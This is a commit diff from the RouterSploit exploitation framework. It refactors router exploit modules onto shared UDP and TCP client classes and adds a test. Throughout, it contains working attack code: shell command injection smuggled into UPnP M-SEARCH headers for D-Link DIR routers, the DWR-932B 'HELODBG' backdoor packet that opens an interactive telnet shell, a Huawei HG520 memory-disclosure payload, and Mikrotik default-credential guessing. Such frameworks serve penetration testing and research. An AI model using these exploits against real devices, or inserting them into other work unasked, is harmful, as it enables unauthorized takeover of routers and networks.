Skip to content

R
routersploit
Unverified Commit 0401a67f by Marcin Bury Committed by GitHub
Options

TCP & UDP based exploits (#451) 

* Fixing TCP & UDP based exploits

* Fixing Mikrotik API ROS
parent 214a5447
Showing with 85 additions and 104 deletions
routersploit/modules/creds/routers/mikrotik/api_ros_default_creds.py
......@@ -71,6 +71,7 @@ class Exploit(TCPClient):
def check(self):
tcp_client = self.tcp_connect()
if tcp_client:
self.tcp_close(tcp_client)
return True
return False
......@@ -78,7 +79,8 @@ class Exploit(TCPClient):
def check_default(self):
self.credentials = []
self.run_threads(self.target_function, self.defaults)
data = LockedIterator(self.defaults)
self.run_threads(self.threads, self.target_function, data)
if self.credentials:
return self.credentials
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
......@@ -35,42 +35,40 @@ class Exploit(UDPClient):
print_error("Exploit failed - target seems to be not vulnerable")
def execute(self, cmd):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:uuid:`" + cmd + "`\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
cmd = bytes(cmd, "utf-8")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
sock.close()
except socket.error:
pass
request = (
b"M-SEARCH * HTTP/1.1\r\n" +
b"Host:239.255.255.250:1900\r\n" +
b"ST:uuid:`" + cmd + b"`\r\n" +
b"Man:\"ssdp:discover\"\r\n" +
b"MX:2\r\n\r\n"
)
udp_client = self.udp_create()
self.udp_send(udp_client, request)
self.udp_close(udp_client)
return ""
@mute
def check(self):
buf = ("M-SEARCH * HTTP/1.1\r\n"
"Host:239.255.255.250:1900\r\n"
"ST:upnp:rootdevice\r\n"
"Man:\"ssdp:discover\"\r\n"
"MX:2\r\n\r\n")
request = (
b"M-SEARCH * HTTP/1.1\r\n"
b"Host:239.255.255.250:1900\r\n"
b"ST:upnp:rootdevice\r\n"
b"Man:\"ssdp:discover\"\r\n"
b"MX:2\r\n\r\n"
)
udp_client = self.udp_create()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.connect((self.target, 1900))
sock.send(buf)
response = sock.recv(65535)
sock.close()
except Exception:
return False # target is not vulnerable
if udp_client:
self.udp_send(udp_client, request)
response = self.udp_recv(udp_client, 65535)
self.udp_close(udp_client)
if "Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable
if response and "Linux, UPnP/1.0, DIR-" in response:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
......@@ -30,16 +30,19 @@ class Exploit(UDPClient):
shell(self, architecture="mipsle")
def execute(self, cmd):
buf = ('M-SEARCH * HTTP/1.1\r\n'
'HOST:' + self.target + ':1900\r\n'
'ST:urn:schemas-upnp-org:service:WANIPConnection:1;' + cmd + ';ls\r\n'
'MX:2\r\n'
'MAN:"ssdp:discover"\r\n\r\n')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((self.target, 1900))
s.send(buf)
s.close()
request = (
"M-SEARCH * HTTP/1.1\r\n" +
"HOST:{}:{}\r\n".format(self.target, self.port) +
"ST:urn:schemas-upnp-org:service:WANIPConnection:1;{};ls\r\n".format(cmd) +
"MX:2\r\n" +
"MAN:\"ssdp:discover\"\r\n\r\n"
)
request = bytes(request, "utf-8")
udp_client = self.udp_create()
self.udp_send(udp_client)
self.udp_close(udp_client)
return ""
......
routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
import socket
import telnetlib
from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient
from routersploit.core.udp.udp_client import UDPClient
from routersploit.core.telnet.telnet_client import TelnetClient
class Exploit(TCPClient, TelnetClient):
class Exploit(UDPClient, TelnetClient):
__info__ = {
"name": "D-Link DWR-932B",
"description": "Module exploits D-Link DWR-932B backdoor vulnerability which allows "
......@@ -23,48 +21,27 @@ class Exploit(TCPClient, TelnetClient):
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(23, "Target Telnet port")
port = OptPort(39889, "Target Telnet port")
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
print_status("Sending backdoor packet...")
response = ""
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
except Exception:
pass
sock.close()
if "Hello" in response:
print_success("Target seems to vulnerable")
print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port))
try:
tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact()
except Exception:
print_status("Sending backdoor packet")
if self.check():
telnet_client = self.telnet_connect(port=23)
if telnet_client:
self.telnet_interactive(telnet_client)
self.telnet_close(telnet_client)
else:
print_error("Exploit failed - could not connect to the telnet service")
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute
def check(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10.0)
try:
sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024)
udp_client = self.udp_create()
self.udp_send(udp_client, b"HELODBG")
if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable
except Exception:
pass
response = self.udp_recv(udp_client, 1024)
if response and "Hello" in response:
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
import socket
from routersploit.core.exploit import*
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
......@@ -62,36 +61,24 @@ class Exploit(UDPClient):
b"\xb8\xf9\x12\x00\xcb\x70\x40\x00\x9c\x70\x40\x00"
)
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
print_status("Sending exploit payload")
sock.sendto(self.payload, (self.target, 43690))
self.content = ""
try:
print_status("Waiting for response")
response = sock.recv(1024)
except Exception:
def run(self):
if self.check():
print_status("Target returned data")
print_info(self.content)
else:
print_error("Exploit failed - device seems to be not vulnerable")
return
if len(response):
print_success("Exploit success")
print_info(response)
@mute
def check(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(10)
sock.sendto(self.payload, (self.target, 43690))
try:
response = sock.recv(1024)
except Exception:
return False # target is not vulnerable
udp_client = self.udp_create()
self.udp_send(udp_client, self.payload)
response = self.udp_recv(udp_client, 1024)
self.udp_close(udp_client)
if len(response):
if response:
self.content = response
return True # target is vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/routers/netcore/udp_53413_rce.py
......@@ -39,6 +39,7 @@ class Exploit(UDPClient):
udp_client = self.udp_create()
self.udp_send(udp_client, payload)
response = self.udp_recv(udp_client, 1024)
self.udp_close(udp_client)
if response:
return str(response[8:], "utf-8")
......
tests/creds/routers/mikrotik/test_api_ros_default_creds.py 0 → 100644
from routersploit.modules.creds.routers.mikrotik.api_ros_default_creds import Exploit
def test_check_success(tcp_target):
""" Test scenario - testing against mikrotik api ros server """
exploit = Exploit()
exploit.target = tcp_target.host
exploit.port = tcp_target.port
assert exploit.check()
# assert exploit.check_default() is None
# assert exploit.run() is None
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment